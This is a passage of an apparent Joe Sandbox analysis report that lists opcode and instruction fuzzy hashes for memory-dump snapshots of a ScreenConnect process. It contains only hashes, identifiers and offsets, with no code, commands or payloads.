                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1c22457fc1cbf9d8befcb8439869072ad2dceae62bde1b7d85da533cdda8d42
                                                                                              • Instruction ID: 1a3e5356cd2165337e8780511da5b45e2c8cc75bdd36cf342de003568c064d74
                                                                                              • Opcode Fuzzy Hash: e1c22457fc1cbf9d8befcb8439869072ad2dceae62bde1b7d85da533cdda8d42
                                                                                              • Instruction Fuzzy Hash: 2B118131B09A4A4FDBD9EF58C061A6577E1FF64340B8540A8C44DCB197DE36E941C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 453e79bcf07399172c8ed941d253c011b5a76a56a9b95d077d38584e1ca3290f
                                                                                              • Instruction ID: 988894aa003358f20b08d97b7811c0bbdadfcdc73532be4e1c995c04084cd291
                                                                                              • Opcode Fuzzy Hash: 453e79bcf07399172c8ed941d253c011b5a76a56a9b95d077d38584e1ca3290f
                                                                                              • Instruction Fuzzy Hash: 8E016170909A8D8FCF46DF68C8059E97BF0FF59315B0542A6E448D7261CB749944CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0770867f99106a0e208d34dac015db55200ef624da755827dc086a8d10aee7ef
                                                                                              • Instruction ID: 4953144f908778cfd98bcb99a963a6f22279166917f381c9c541be7890fad69e
                                                                                              • Opcode Fuzzy Hash: 0770867f99106a0e208d34dac015db55200ef624da755827dc086a8d10aee7ef
                                                                                              • Instruction Fuzzy Hash: D1116071B09A4A4FDBD9EF58C461B5577E2FF68344B8540A8C44DCB297DE36E901C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c51e3fe78c16fbe14cb6a74f9443e7e141e77ac9b1d4393137554fd2468e04be
                                                                                              • Instruction ID: 77903ebe0a9a1bdd328fd681c4a1853f7da31874fdf0a8574d84dd6b56903238
                                                                                              • Opcode Fuzzy Hash: c51e3fe78c16fbe14cb6a74f9443e7e141e77ac9b1d4393137554fd2468e04be
                                                                                              • Instruction Fuzzy Hash: 7C010C30A14A4E8FDBA4EF589425AAE72E1FF58301F4108BAE41DD32E5DE7569508B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3dd8514770bcea6984151fcf90d1cfb04b8505d6c7c267685dd618a65e8dd4e6
                                                                                              • Instruction ID: 9d50a9d9d6408773c6a85fdba0d1592e57dadfbde1a2d176493f9a32d946ea50
                                                                                              • Opcode Fuzzy Hash: 3dd8514770bcea6984151fcf90d1cfb04b8505d6c7c267685dd618a65e8dd4e6
                                                                                              • Instruction Fuzzy Hash: 0B11CA3060EA854FD356F72CD470AB47B90EF02218B1601FFC49DC60E7CD1919498355
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc9037d49aac5eda7e2a9014a6fdcab7bb9a612e058d71bc9ec86c58d087e8d1
                                                                                              • Instruction ID: 5a12ebb12a68becc49529ff0dfdda5ea1ef420249012f2b09df6cf2e2bd1dc4e
                                                                                              • Opcode Fuzzy Hash: dc9037d49aac5eda7e2a9014a6fdcab7bb9a612e058d71bc9ec86c58d087e8d1
                                                                                              • Instruction Fuzzy Hash: CC01FC6171DD4E0BDB98EA6C4094DB9B3D1EFA822575403B6DC1CC719ADD24DD418340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c9d68a5f818a41d789a564214ce795a0562eb960af9abea07b6c60dab192d720
                                                                                              • Instruction ID: 6caa7ff7863914ba7d74fde465598015f3ca6d32fea5184f1f726dae4fe72b45
                                                                                              • Opcode Fuzzy Hash: c9d68a5f818a41d789a564214ce795a0562eb960af9abea07b6c60dab192d720
                                                                                              • Instruction Fuzzy Hash: A9012812B1DE8E1FEB99977C64349A477D1EF95210B0902F7D40CC71A7E918D9418341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cdb0a0747292ecb4558d5b9de025a30541bd8f21412b2a71ce298fcd3edb148e
                                                                                              • Instruction ID: b19bdf9dcefa22a61dd8dd00b62648f391072186cbc513238449da19f177b10e
                                                                                              • Opcode Fuzzy Hash: cdb0a0747292ecb4558d5b9de025a30541bd8f21412b2a71ce298fcd3edb148e
                                                                                              • Instruction Fuzzy Hash: F701D12160FA8D0FE3969B7D5C681A07FE1EF5B21130901E7E488CB263E811AC858341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e19aa334565332be51df90f3b2949c8e1386a864011e247bb6e796ecc80c229b
                                                                                              • Instruction ID: 89ff898ea4ea33bc05dea26f98ea2cf0ff9e825047c67fcab6a5a7960823202c
                                                                                              • Opcode Fuzzy Hash: e19aa334565332be51df90f3b2949c8e1386a864011e247bb6e796ecc80c229b
                                                                                              • Instruction Fuzzy Hash: 68017120B25D4E4FE798DB1C8479BB873D2EF58740F5401B9D45EC72E2DD6A6C018340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9dbe0be5c27064bd4a039a73d648c8a9ef512ccf88d6f077bdeed8bb52be5033
                                                                                              • Instruction ID: 1cc5377fdb97bdcff9dfa521b017e26558ea79e5d0d1e0e364edb31b5169a623
                                                                                              • Opcode Fuzzy Hash: 9dbe0be5c27064bd4a039a73d648c8a9ef512ccf88d6f077bdeed8bb52be5033
                                                                                              • Instruction Fuzzy Hash: 8FF0F421B25E0A0FDB98EB6C9894A76B3C1FBA831070446BAD41DC32A9DC24E8428380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05944b7899e1a957a385ec5221252e9ab3905fc3d296fbaa9f6b0c9b1da0dcb0
                                                                                              • Instruction ID: 7edd38a27c8be8f97cc33b96fed474814307280a5961c04d47ad009b37dafced
                                                                                              • Opcode Fuzzy Hash: 05944b7899e1a957a385ec5221252e9ab3905fc3d296fbaa9f6b0c9b1da0dcb0
                                                                                              • Instruction Fuzzy Hash: 4BF02321718D4E0B9F88EB6C5099DFA73C1EB9822071002B7D81CC31EFDC25D9418380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d1bdf7b8e8496d8f7c3c4a77f9a65306a2e5e5b3f1e0aa366703ad63bfe4ff
                                                                                              • Instruction ID: 3100485a0b46fade9ca36b789e0f73f90d664b13b1f149ddacf74555353d466d
                                                                                              • Opcode Fuzzy Hash: b6d1bdf7b8e8496d8f7c3c4a77f9a65306a2e5e5b3f1e0aa366703ad63bfe4ff
                                                                                              • Instruction Fuzzy Hash: 6A015E31718E4E8FDF94DF2884A066933E2FF6930471501A8D81EC729ADE35E842CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8234d96b0d37ff0a13420010179c0a11c89bd0d2c27e4f3f3a4ca523dff5914b
                                                                                              • Instruction ID: cc2fd633cc3b18470d4150d966440f0158db01ad70b4521fb19b32b3c22329e0
                                                                                              • Opcode Fuzzy Hash: 8234d96b0d37ff0a13420010179c0a11c89bd0d2c27e4f3f3a4ca523dff5914b
                                                                                              • Instruction Fuzzy Hash: E9015A30A0890D8FDB98EF18C464BE933E1FF58314F1002AAD80DC7295DA26A982C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb537558ad628ede3a1237138072e1a51387accd0bd723772eb711b96eba9d33
                                                                                              • Instruction ID: 845ca32ad224134d28cb5804b31907cf0c6ace27b8a9139a035ee765d2016812
                                                                                              • Opcode Fuzzy Hash: eb537558ad628ede3a1237138072e1a51387accd0bd723772eb711b96eba9d33
                                                                                              • Instruction Fuzzy Hash: C0F0C263F1DC1E0BE7F4959CA46567A93C2EBA8AB074653B2D41DC32A4ED18AD8343C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50504819c664856f6b8a3944965bbee9347f72f1793bbd143e0183c928870ec6
                                                                                              • Instruction ID: 4ded2f748c5ab86e75b1fbd6daf245c1767c3e8d5e541c6d1adc7cb04e28a1ab
                                                                                              • Opcode Fuzzy Hash: 50504819c664856f6b8a3944965bbee9347f72f1793bbd143e0183c928870ec6
                                                                                              • Instruction Fuzzy Hash: FB014F7194EBCD4FDB52DB6888258997FB0FE16311B0A02DBD198CB1A3D314A948C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 79968cc527d34301a9e2731a0bdb9c9483763fcbf407e288fabbed7662ace95f
                                                                                              • Instruction ID: 5a5323601ed0a0609e24f55ed1d77666b88f70302d5469a7fda7a839d8ba9304
                                                                                              • Opcode Fuzzy Hash: 79968cc527d34301a9e2731a0bdb9c9483763fcbf407e288fabbed7662ace95f
                                                                                              • Instruction Fuzzy Hash: 4E019E30E1AE8E9FEB58EB6880A9AA877B0EF10344F410879D01DD2192CE79BA54C741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3cce8f5b94a5537573953558cb7dfd96ffb90fc1fe0c2a9d0607f52edebc718f
                                                                                              • Instruction ID: 6c68b590f122045128f480ced62e0f0e0aa4ee27156b7d8252ec621cd0ebfd83
                                                                                              • Opcode Fuzzy Hash: 3cce8f5b94a5537573953558cb7dfd96ffb90fc1fe0c2a9d0607f52edebc718f
                                                                                              • Instruction Fuzzy Hash: 29F062A2B1AE4A0BEFF8DAAC546556533C2EFA87907150176D418C72AAFE24FC138240
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbd1599a6a0ca0974553c135cf11ba0855685e16a5751b20839f1d8592cc507c
                                                                                              • Instruction ID: 87071abc31d3a185234cd1f4c50f8e2d0404fe744be1fa206c5eb5426dc3bff1
                                                                                              • Opcode Fuzzy Hash: dbd1599a6a0ca0974553c135cf11ba0855685e16a5751b20839f1d8592cc507c
                                                                                              • Instruction Fuzzy Hash: DE018130E4AB4DDFEB58EB6490A5AAC77A0EF54300F5108B9D40DD71A2CEB9AA84C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c995f0385ca0a0be0a86caf563006e362164b46123fa08ef4de4ffd64069674
                                                                                              • Instruction ID: cd9ea30b5f0f45865ac2a7b61b9cd55ca461c48347f32e3721b146952c3ed663
                                                                                              • Opcode Fuzzy Hash: 7c995f0385ca0a0be0a86caf563006e362164b46123fa08ef4de4ffd64069674
                                                                                              • Instruction Fuzzy Hash: C1F0903190854C8FCB44DF68C849DEA7BF0EF5A301B0501A7E40CC7121CA249A44CBE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 847350a9f89efd5acf21089af5779718d991274086dc3a2655a847d3e6a5b3c2
                                                                                              • Instruction ID: 6f98f71903f58622bd34e4e03ce5ac704f795e24afcda05521ff410d9f489751
                                                                                              • Opcode Fuzzy Hash: 847350a9f89efd5acf21089af5779718d991274086dc3a2655a847d3e6a5b3c2
                                                                                              • Instruction Fuzzy Hash: 6BF0A43060DA994FE795DB28D874B71BBE1EF46244B5900FEC44CCB1E7DA29A845C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ef1e7c0874776fb477b1e2242a2c6c77c34218260807a3d3aa233af811ba3b7
                                                                                              • Instruction ID: ef73bbcce2f946589cf8b4d0379e0bb6a98618f9a98f3423deacaf45004e5799
                                                                                              • Opcode Fuzzy Hash: 4ef1e7c0874776fb477b1e2242a2c6c77c34218260807a3d3aa233af811ba3b7
                                                                                              • Instruction Fuzzy Hash: 47F02462B1FD8E0BF7A4D4BC189966573C2EF7815071842BAA489C71AAFE14ED068380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e2c209316083d401480a34e62df0cf38b0d26aceb60fd267ac28ff6d64c8d9ab
                                                                                              • Instruction ID: 2f300111f25745afe82fc771f0fa5eba547b0466421854bd1fb505db4559ebe0
                                                                                              • Opcode Fuzzy Hash: e2c209316083d401480a34e62df0cf38b0d26aceb60fd267ac28ff6d64c8d9ab
                                                                                              • Instruction Fuzzy Hash: 98F09C70A04A0D8FCF44EF58C8499E97BF1FF68315F01426AE40DE7264D7759954CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c01117c398be38a062561956e9f79d5a1b6a8d448771f6afe70d6a1603e4d147
                                                                                              • Instruction ID: 8d58acc9abaabd2a1e34555957a4b70064ff7c57f09d956231f53114a95a61ee
                                                                                              • Opcode Fuzzy Hash: c01117c398be38a062561956e9f79d5a1b6a8d448771f6afe70d6a1603e4d147
                                                                                              • Instruction Fuzzy Hash: 7FF05072D0968D9FD7A5DF6884590ED7FB0FF45240F4101F7D81DC60A2DE306A418740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 49596d2c9b4defb1d8c10d3b5efdb10fc95c4c6931c906929b086daac2fc3944
                                                                                              • Instruction ID: e55431d2245a3f9619b82aeb14c7deb49c810c0cfff7ff5455349cb4e25128de
                                                                                              • Opcode Fuzzy Hash: 49596d2c9b4defb1d8c10d3b5efdb10fc95c4c6931c906929b086daac2fc3944
                                                                                              • Instruction Fuzzy Hash: 8AE0D86150F3D41FDB579B34C4688E03F60EE2722034901EBD485CF0B3E5148A89C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1fa4638fbb068fa3882a95a37adf5a91dcc800d0c0b1f7bb000b952c87ad3fe
                                                                                              • Instruction ID: c3dc24cdc58063ea25fdcff93f2839c31e6b9cf32515d0c8619117ef10eb5aca
                                                                                              • Opcode Fuzzy Hash: a1fa4638fbb068fa3882a95a37adf5a91dcc800d0c0b1f7bb000b952c87ad3fe
                                                                                              • Instruction Fuzzy Hash: 03E0483070990D4FDB94EB2CE454A64B3D2EF5531539405B5D40DC72AADE26DC91C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b67d7b43032d8afa4165fc9e5656e4dbe881ee543320c1984e4aae69f7c14cfc
                                                                                              • Instruction ID: 3edaa1627c9f27183398af84982752fc22c063f8ea5cc4110050b2fa35368b2a
                                                                                              • Opcode Fuzzy Hash: b67d7b43032d8afa4165fc9e5656e4dbe881ee543320c1984e4aae69f7c14cfc
                                                                                              • Instruction Fuzzy Hash: 8EE09B7090F5954FD7218B758C289E83FA0EF9721070F82FAD0448B467D62C55558751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9254aa77cf0c3cf2d0ed1723c59781905b8c4baf7f5fa9902d5509cd0f2831d4
                                                                                              • Instruction ID: e893535633bb0c1f8e1381d5fe1b42e4f3c6f7ed31fe59db5042faba7efa898e
                                                                                              • Opcode Fuzzy Hash: 9254aa77cf0c3cf2d0ed1723c59781905b8c4baf7f5fa9902d5509cd0f2831d4
                                                                                              • Instruction Fuzzy Hash: 08E0DF22A0EE594EF7B46278086A138AAC0DB99310B1808BFE80CC22F3EC6A18400245
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0db544d59196e87a56d73429e91d58565b1eccf22d288123775e660a32afbca3
                                                                                              • Instruction ID: 17495699f0fa1867898be39af0f8d1a9bdc65da9b7a71ab6300baddc2b03407c
                                                                                              • Opcode Fuzzy Hash: 0db544d59196e87a56d73429e91d58565b1eccf22d288123775e660a32afbca3
                                                                                              • Instruction Fuzzy Hash: 5FE08615E4E61B02FBBC13A568A13B550E0DF04355F46407E9419C00D6DC9C9D824552
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e3c779f6334158ccefacde5dcb3ed94058f73a7510ab037b5b57b2f2e991512b
                                                                                              • Instruction ID: a80376d4733393251edf3aa57df3b801219391e2ed2630c83e0f6d1ed59c9e9d
                                                                                              • Opcode Fuzzy Hash: e3c779f6334158ccefacde5dcb3ed94058f73a7510ab037b5b57b2f2e991512b
                                                                                              • Instruction Fuzzy Hash: 55E0C231A1EE1C4FE7A86238145A1746AC0DB99351B1809AFE40CD33B6E82A08400285
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 172a6cb0f4ab5861be19178f43e5b704697f454b55e279fd8bd322a146f30dfb
                                                                                              • Instruction ID: d182e23e8ff64f897d235f426fdd9cfcb1e62c08c24094c85d0270e1a141c8ee
                                                                                              • Opcode Fuzzy Hash: 172a6cb0f4ab5861be19178f43e5b704697f454b55e279fd8bd322a146f30dfb
                                                                                              • Instruction Fuzzy Hash: C6D0221260FECD0EF365D0981C64064BF91CA990E032C02EBC854CA0B3D8091EC84390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 466b9f1263035d34aa786de55191f53c7a032200fa3e5177886298d3834a82c7
                                                                                              • Instruction ID: bc8bd9dc3c4554272665c2fc12e04e5c836417a71915254c2d91322899a37e7a
                                                                                              • Opcode Fuzzy Hash: 466b9f1263035d34aa786de55191f53c7a032200fa3e5177886298d3834a82c7
                                                                                              • Instruction Fuzzy Hash: 16C04C01B5D82E0B95A8A15D34656B891C1D78866578511F2E80CD229EDC095E9203C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
                                                                                              • Instruction ID: 01a6c89cb8105affedf1a701b457a7f384b33697b739961122c82b9b1a944dd8
                                                                                              • Opcode Fuzzy Hash: c7559c13bf02bbc0b6889aa1e9ca45d8b796ccc6a74f11d1d320752045ff42c4
                                                                                              • Instruction Fuzzy Hash: 7ED01220E1E91F4ADA78EAA5AC552E837D0E75D321F865234F009C35A8E77C51A48741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 211d8ea40b675e3bf43a6bf633d9624fe979c724c1a34933567c3754f6c4a9af
                                                                                              • Instruction ID: 6f53884982de28e8f09b02c7b63dd280bbd1a8c7afb552deeb22d9d760d92158
